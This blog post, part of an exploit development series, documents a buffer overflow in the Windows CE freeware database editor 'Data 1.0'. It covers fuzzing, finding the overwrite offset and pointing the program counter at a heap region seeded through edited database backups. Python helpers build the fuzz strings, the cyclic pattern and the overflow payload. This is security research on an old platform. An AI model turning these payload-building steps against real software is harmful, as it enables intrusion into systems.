Windows CE SuperH3 Exploit Development Part 4: Buffer Overflows Take Two, Heap Spritzing, and Turning Lessons Learned into Success

Elias Augusto
13 min read · Mar 26, 2019


Welcome back to SH3 exploit development! Sorry if this part of the series is a bit more informal than the last few. I’m very excited and I want to show you all everything. I’m just going to get into it: I found another buffer overflow that overwrites the PC, but this time there’s also ample space in memory to store shellcode, and I can actually point to it!

This isn’t the only program I’ve been testing while I’ve been gone. Freeware Windows CE 2.11 programs seem to be lousy with buffer overflows. There’s no SEH, and program exception handlers can be bypassed without much effort. The main obstacle is that the vast majority of these buffer overflows are Unicode filtered. This poses some issues when it comes to shellcoding, but I have careful research on my side this time.

Onto the tutorial! I’ll show you why I chose this program, how I found this overflow, how I constructed and tested the skeleton payload, and my plan for the shellcode.

Selection

This time around I guaranteed that I would eventually find an exploitable overflow, whether vanilla or heap-based, by testing as many freeware programs as I could. I chose portable executables instead of installable CAB files this time because I could reverse engineer them without extracting the PE files and transfer them without worrying about dependencies. I analyzed about five, but I put the buffer overflow analysis on pause for most of them. I had success with the first two programs I looked at, so I decided to focus on those first. One is the subject of this article, and the other will be covered in an upcoming piece on heap overflows.

The program I eventually chose is called “Data 1.0”. It’s a minimalist Windows CE database editor written by a “Micro Cheng”. It allows for the creation of new databases with predefined fields. It can be found on HPCFactor.com (account required for download):

Update: A slightly newer version of this software (1.08) exists, but I am unsure whether it contains the same vulnerability. It can be downloaded from the developer’s website:

The first step I took was connecting to the Windows CE PDA using ActiveSync 3.5 and opening the program up with what is, in my opinion, Embedded Visual Tools’ saving grace: the Heap Walker.

God the heap walker is so cool!

I then created a document detailing all of the ways to get user input onto the heap and persistence techniques.

I soon figured out three key things:

  • Every time the program opens a database, all of its records are immediately loaded onto the heap in full.
  • Every record except for “Name” and “Home Telephone” is stored in a different 500-ish byte chunk on the heap.
  • Every database that is loaded onto the heap will have its records loaded into chunks at the same offsets in program memory every time that specific database is opened. If I find data from a record at address 0x00039000, it will always be at 0x00039000 if I open up the program and load that database.

I figured that if I could overwrite the EIP, storing the shellcode in the heap would be relatively simple. I didn’t know much about Windows CE 2.11 defenses other than the relative lack thereof, so I decided to use the Radare2 tool Rabin2 to figure out what sort of protections this PE had.

Author’s Note: I use PC and EIP interchangeably in this guide. Old habits die hard I guess, but they’re basically the same for vanilla buffer overflow purposes.

It only had relocs, which was fine because I was dealing with offsets, not fixed addresses. I then moved onto the debugging phase to look for an overwrite.

Debugging

Scripting capabilities on Windows CE 2.11 are extremely limited, especially when attempting to inject data into a GUI application. That’s why I use some good old-fashioned manual fuzzing to overwrite the EIP. I created a file with strings of A’s ranging from 50 to 2500 characters long, and I usually just try to paste them into whichever input I can.
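A file like this is easy to generate on the desktop side. Here is a minimal sketch of one way to do it. The step size of 50, the helper names, and the one-string-per-line layout are assumptions for illustration; only the 50 to 2500 range comes from the text above.

```python
# Sketch: build strings of a repeated filler character for manual paste-fuzzing.
# The step of 50 and both helper names are assumptions, not the original workflow.

def make_fuzz_strings(start=50, stop=2500, step=50, filler="A"):
    """Return filler strings whose lengths run from start to stop inclusive."""
    return [filler * length for length in range(start, stop + 1, step)]


def write_fuzz_file(path, strings):
    """Write each string on its own line, preceded by a line giving its length."""
    with open(path, "w", encoding="ascii", newline="\r\n") as handle:
        for s in strings:
            handle.write(f"--- {len(s)} characters ---\n")
            handle.write(s + "\n")
```

Calling `write_fuzz_file("fuzz.txt", make_fuzz_strings())` would produce a text file that can be copied to the device and pasted from, one length at a time.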

I learned how to use the screenshot tool! Also a great feature of EVT

Author’s Note: I avoided the database header because I wanted to create a valid database to test heap storage. Here I didn’t inject into the database “Name” category, but I’ve tested both the database header and the “Name” category, same story as all of the other inputs.

This time I sort of arbitrarily decided to use G’s rather than A’s. I started out with a 500 character “G” string in one of the programs, and got this exception:

Hm…that’s indicative of heap trouble rather than vanilla overwrites, but I knew the register window would tell me more.

Ok, so I knew that the PC (for our purposes the EIP) and the PR (which stores the return address) were being overwritten, and I knew from prior experience that they’re always overwritten at the same offset, but I didn’t want to overwrite r8 or r9, or overflow the heap. Note that here the stack frame pointer is also zeroed, but that doesn’t really matter for our purposes. I needed an offset that would only overwrite the PC and PR, nothing else.

Using the pattern creator in the Metasploit toolset, I generated a pattern that I then transferred to the PDA.

I pasted it into the buffer and, using the gnarly Unicode text that overwrote several of the registers, tried to figure out the offset.

This wasn’t my first rodeo, so I knew how to use the characters around the offset to construct something that I could send to pattern_offset.rb.

I had an “A”, a “6”, a “5”, and an “i”. Because I know how the pattern generator works and that the first byte into the PC in an overwrite is the last one displayed, I was able to figure out pretty easily that I was looking at “i5A”.

I typed it in incorrectly here, but I still got the correct offset, so I was fine

The offset was 256 (characters, not bytes). Through some more testing I determined that every category had the same offset, and that the 257th and 258th characters overwrote the PC and PR without overwriting any other register.
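For anyone who wants to double-check the offset without Metasploit on hand, here is a small sketch that rebuilds a pattern in the same uppercase/lowercase/digit style and searches it. The function names are my own and this is not the Metasploit code itself, just an imitation of its output format.

```python
import string


def pattern_create(length):
    """Build a cyclic pattern in the Upper/lower/digit style (Aa0Aa1Aa2...)."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(pattern, needle):
    """Return the index of the first occurrence of needle, or -1 if absent."""
    return pattern.find(needle)


pattern = pattern_create(500)
print(pattern_offset(pattern, "i5A"))  # prints 256
```

The triple “Ai5” starts at index 255, so “i5A” (the tail of “Ai5” plus the head of “Ai6”) lands at index 256, which matches the offset reported above.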

Now I was faced with an addressing challenge. I could only address using valid Unicode, but the heap offset started with 0x0003. 0x03 is a valid ASCII character, the end of text (ETX) character. It is not printable, and in ssh (as I learned the hard way) it is interchangeable with Ctrl+C. Using enough database entries with enough stored data, I could theoretically push the heap into a printable ASCII address, but I was afraid that this would crash the program. Instead, I tested a couple of different strategies for making non-printable ASCII into printable Unicode. The most successful one, which I will share with you, involved some hex editing.

From this point on, most of the files that I had to transfer could not be transferred using a CF card while also ensuring data integrity during transfer. This goes for the hex file and the database files that will be discussed later. To ensure that the files transferred correctly, I created a shared folder using ActiveSync 3.5.

After doing this, I opened up a hex editor and created a file with nothing other than a 03 inside of it.
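If you don’t have a hex editor handy, the same file can be produced with a couple of lines of script. This is only a sketch; the helper name and the file name in the usage note are made up for illustration.

```python
from pathlib import Path


def write_raw_bytes(path, values):
    """Write the given byte values to path with no encoding or newline added."""
    data = bytes(values)
    Path(path).write_bytes(data)
    return data
```

For example, `write_raw_bytes("etx.txt", [0x03])` creates a one-byte file containing only 0x03.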

I then transferred this file over to the PDA and copied the character.

Author’s Note: What is actually pictured here is 0x2F and 0x05. This is a different text file containing an offset that will be used later in this post. I’m using this file because my sync folder got corrupted in a tragic accident and I didn’t want to re-transfer it. The concept is the same.

I appended two of them to the end of my 256 character D string, and to my surprise, this worked! I was able to transfer a non-printable ASCII character as valid Unicode using nothing but the weird box thingy that all non-recognized characters have!

The disparity pictured here between the valid heap address in the PC and the one that starts with a 240 in the disassembly window is the relocs acting. If we went to the address in disassembly in the memory window, we’d see that it was on the heap.

Now I just needed data to point at: the skeleton payload itself, and its address to overwrite the PC with.

Heap Spritzing

My only problem now was embedding shellcode in the heap. I couldn’t use the same method I used previously for non-printable characters, but I eventually figured out that I could just back up the database using DBBackup (also from HPCFactor), put the backup in the synced folder, edit the data using a hex editor, and transfer it back using the restore option.

I learned the hard way that I could not change the length of the database. I also quickly figured out that if I made a database of just shellcode, Data.exe wouldn’t be able to process it. Instead, I designed the database like this:

  • 25 entries, 23 usable entries.
  • Names are numbers, and the entries all have to be written in order, or the data will not restore in the correct order and the shellcode will not be processed.
  • Entries “One” and “TwentyFive” are full of J’s in every category except for the name.
  • Every other entry is full of X’s.

Because I could fit 255 characters in every entry, this gave me 82,110 bytes of usable data in 510 byte chunks. I called this method “Heap Spritzing” because it’s reminiscent of a classic heap spray attack, but on a much smaller scale. I just wanted an address that was easy to point to. The X’s were used as markers; I overwrote them with “00 90”. This was sort of a symbolic thing, as the nop in SH3 is “0x9000”, but this is not executable due to the null bytes.
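The byte count is easy to sanity-check. The sketch below works backwards from the numbers in the text; the two bytes per character comes from the Unicode storage, while the figure of seven chunk-backed fields per entry is not stated anywhere above and is only what the arithmetic implies.

```python
# Numbers taken from the text above.
CHARS_PER_FIELD = 255
USABLE_ENTRIES = 23
TOTAL_BYTES = 82_110

# Assumption: each character is stored as a 2-byte Unicode code unit.
BYTES_PER_CHAR = 2

chunk_bytes = CHARS_PER_FIELD * BYTES_PER_CHAR   # 510 bytes per chunk
chunks = TOTAL_BYTES // chunk_bytes              # 161 chunks in total
fields_per_entry = chunks // USABLE_ENTRIES      # 7 fields per entry (inferred)

print(chunk_bytes, chunks, fields_per_entry)     # prints 510 161 7
```

In other words, 23 entries × 7 fields × 510 bytes = 82,110 bytes, which is consistent with each non-name field getting its own chunk.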

Author’s Note: I actually determined that I couldn’t inject ASCII shellcode this way by attempting to use 1361 (mov r1,r1), which I figured would serve as an alternative nop. Crashed the program, overwrote r11, didn’t explore this further.
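The marker replacement can also be scripted instead of done by hand in a hex editor. Below is a minimal sketch of a same-length patch over the raw backup bytes. I’m assuming the markers appear in the backup as 2-byte little-endian Unicode characters; the DBBackup file format itself isn’t documented here, so treat the function name and that encoding as hypothetical.

```python
def patch_markers(data, marker_run, replacement):
    """Replace every occurrence of marker_run with replacement, keeping file length.

    Both arguments are raw bytes. They must be the same length, because the
    database cannot change size without breaking the restore.
    """
    if len(marker_run) != len(replacement):
        raise ValueError("replacement must be exactly as long as the marker run")
    if marker_run not in data:
        raise ValueError("marker run not found in data")
    patched = data.replace(marker_run, replacement)
    # Sanity check: a same-length substitution never changes the total size.
    assert len(patched) == len(data)
    return patched
```

Matching a full run of markers, such as `("X" * 255).encode("utf-16-le")`, rather than a single character makes it much less likely that unrelated bytes in the file get overwritten by accident.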

I then restored the database with the shellcode intact. Using the heap walker, I found an offset that I could point at pretty easily, 0x0005002F, which is just two valid ASCII characters. I transferred them over using the same method as before, set the program up in the debugger, and sent the payload.
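To see why 0x0005002F works out to two pasteable characters, here is a sketch that splits a 32-bit address into the two 16-bit Unicode characters that would land in memory in little-endian order, then appends them to the filler. The function names and the filler character are illustrative, and the low-half-first ordering is my reading of the 0x2F and 0x05 bytes mentioned earlier.

```python
import struct


def address_to_chars(address):
    """Turn a 32-bit address into two UTF-16 characters, low halfword first."""
    raw = struct.pack("<I", address)   # little-endian bytes, e.g. 2F 00 05 00
    # Note: this raises UnicodeDecodeError if a halfword falls in the
    # surrogate range (0xD800-0xDFFF), which cannot be a lone character.
    return raw.decode("utf-16-le")


def build_payload(address, offset=256, filler="G"):
    """Filler up to the overwrite offset, followed by the two address characters."""
    return filler * offset + address_to_chars(address)


payload = build_payload(0x0005002F)
print([hex(ord(c)) for c in payload[-2:]])  # prints ['0x2f', '0x5']
```

The last two characters are “/” (0x2F) and the non-printable 0x05, so characters 257 and 258 of the payload carry the whole address.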

I was able to verify in the memory, disassembly, and register windows without any breakpoints that I was pointing to our space. I will note that the heap view shows the location off by one byte, which is important to consider when placing shellcode.

Author’s Note: I did this without breakpoints out of necessity, not by choice. The inability to move to an offset in the disassembly window and the fact that when testing some programs the debugger crashes if you scroll too high made breaking in the heap infeasible. However, if you have enough time to scroll up to the heap and the debugger doesn’t crash on you, nothing is stopping you from setting heap breakpoints. This is demonstrated in the “Security Warriors” chapter on Windows CE software cracking.

Shellcode Design

My next step is designing the actual shellcode. This bit is going to be difficult, because to my knowledge nobody has been in this exact scenario before. I can’t generate a ready-made payload, nor can I wrap the shellcode to eliminate the Unicode issue, because I’m exploiting a program running on an esoteric RISC processor. ARM assembly is similar to SH3 assembly, but the scenario is different. Generally ARM shellcode is written for Linux systems, and ARM Windows CE shellcode doesn’t usually target Unicode-filtered buffers. For this reason I’ll be drawing knowledge from sources such as Unicode filter bypass tutorials, ARM shellcoding tutorials, and existing exploits for later versions of Windows CE running on ARM processors. I’ve listed a few of these in the “Sources” section below.

To do anything visible I’ll also need to load the CE coredll, but ARM shellcoders have found methods that are similar to the standard shellcode method of loading a system dll. Analyzing other Windows CE 2.11 programs and the DLL itself will get me some of the offsets I need in order to access functions.

I have two main choices of assembler for generating shellcode: the Renesas C/C++ Compiler for the SuperH line, which comes with an assembler, or the on-device gcc assembler for the JLime Linux distribution. They both spit out ELF files that I can analyze easily, so either one is fine. I could also try to do something with Visual Studio. I have a couple of options.

My design idea is simple. Because I’m working with a lot of smallish chunks of memory, I want to do an “omelette egghunter”, where each segment of the shellcode includes an egghunter to search for a subsequent segment. I can’t rely on SEH to help me search memory, so this is going to be interesting. My hope is to either display a popup or open calc.exe (a classic PoC), whichever is simpler. If all else fails, I can just use a malware-like technique where I inject the shellcode into the process memory. That way I only really need one egghunter. In the next article I will be constructing a tester for this shellcode and explaining the shellcode itself. After I successfully develop the shellcode, my plan is to create a VBScript (for no reason other than nostalgia, because that’s what this whole project is fueled by) to generate all of the files necessary for the exploit to work. Until next time!

Update:

I have the program that runs the shellcode done and working. Currently it’s just a nop sled, but I also put a few heap chunks full of non-functional nop sleds in there so that I can replace them with my segmented “omelette” egghunters when I’m ready to test the ASCII and Unicode versions of the final payload.

I was able to use breakpoints in the disassembly window to ensure that the shellcode functioned correctly this time! Progress!

Author’s Note: The Embedded Visual Tools debugger configuration stuff I gloss over in this article is covered in more depth in previous parts of this series. I picked the last one I did because it covers some of the mistakes I made during the first attempt at one of these exploits using this debugger.

Link to DBBackup:

Sources:


Elias Augusto

Enjoys edev, cyber forensics, hardware hacking, and RE, former CACI BIT Systems intern, GREM, Security+